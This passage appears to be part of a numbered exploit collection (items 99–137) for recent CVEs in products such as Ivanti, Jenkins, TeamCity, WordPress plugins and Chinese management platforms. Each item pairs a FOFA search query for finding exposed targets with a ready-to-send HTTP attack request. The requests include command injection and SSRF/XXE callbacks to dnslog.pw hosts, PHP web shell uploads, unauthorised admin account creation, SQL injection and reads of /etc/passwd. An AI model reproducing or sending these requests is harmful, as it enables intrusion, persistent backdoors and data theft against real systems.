id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>             <ds:Signature           xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                   <ds:SignedInfo>                        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                    </ds:SignedInfo>                       <<ds:SignatureValue>qwerty</ds:SignatureValue>                    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                         <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>                   </ds:KeyInfo>                  <ds:Object></ds:Object>         </ds:Signature> </soap:Body></soap:Envelope>
103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 of the XML file contents; the XML file is as follows
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 device cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: <replace with your own token>
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'


POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0


ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthorized admin creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

117. WordPress LayerSlider plugin SQL injection
version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Beijing Baichuo Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

Access /home/src.php

119. Beijing Baichuo Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default account/password is admin/admin
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Beijing Baichuo Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328

File path: /upload/2.php

121. 北京百绰智能 S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328

File path: boot/web/upload/weblogo/1.php

122. 北京百绰智能 S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; decoded it reads sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. 湖南建研 engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

After the user has been created, log in to the admin backend directly; system commands can then be executed.

126. Aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. 广联达 Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin backend URL: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 云商城 file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec (网康) NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. 福建科立迅 communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
